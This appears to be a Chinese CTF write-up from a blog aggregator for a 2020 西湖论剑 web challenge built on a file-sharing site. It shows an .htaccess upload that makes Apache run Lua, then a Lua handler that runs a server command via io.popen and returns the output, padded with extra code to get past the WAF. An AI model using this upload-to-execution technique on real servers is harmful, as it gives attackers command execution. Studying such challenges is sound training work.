zoukankan      html  css  js  c++  java

  • 2020西湖论剑一道web题[网盘]

    题目: 一个网盘系统

    图片:

    解题手法

    1. 上传".htaccess"文件,改成可以执行lua脚本

    内容为:

    SetHandler lua-script
    1. 编写lua脚本,而后进行get方式访问
    require "string"


--[[
     This is the default method name for Lua handlers, see the optional
     function-name in the LuaMapHandler directive to choose a different
     entry point.
--]]
function handle(r)
    r.content_type = "text/plain"


    if r.method == 'GET' then
        local t = io.popen('/readflag')
        local a = t:read("*all")  --相当于t.read("*all"),读取所有内容
        r:puts(a)  -- 把a内容输出到屏幕上
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s
", k, v) )
        end
    elseif r.method == 'POST' then
        r:puts("Hello Lua World!
")
        for k, v in pairs( r:parsebody() ) do
            r:puts( string.format("%s: %s
", k, v) )
        end
    elseif r.method == 'PUT' then
-- use our own Error contents
        r:puts("Unsupported HTTP method " .. r.method)
        r.status = 405
        return apache2.OK
    else
-- use the ErrorDocument
        return 501
    end
    return apache2.OK
end

    其实重要的代码就几行,但是代码太少会被服务器waf查掉。只能写多点了。

    最后访问上传上去的路径,即可得到flag

    搞CTF
  • 相关阅读:
    纯CSS实现垂直居中的几种方法
    用定位实现机器人效果
    Java 集合 HashMap & HashSet 拾遗
    Java 集合 持有引用 & WeakHashMap
    Java 泛型 通配符类型
    多线程threading 的使用
    mysql 数据库的设计三范式
    python 排序算法
    Python 中的单例模式
    mysql 数据库引擎
  • 原文地址:https://www.cnblogs.com/beidaxmf/p/14541223.html
Copyright © 2011-2022 走看看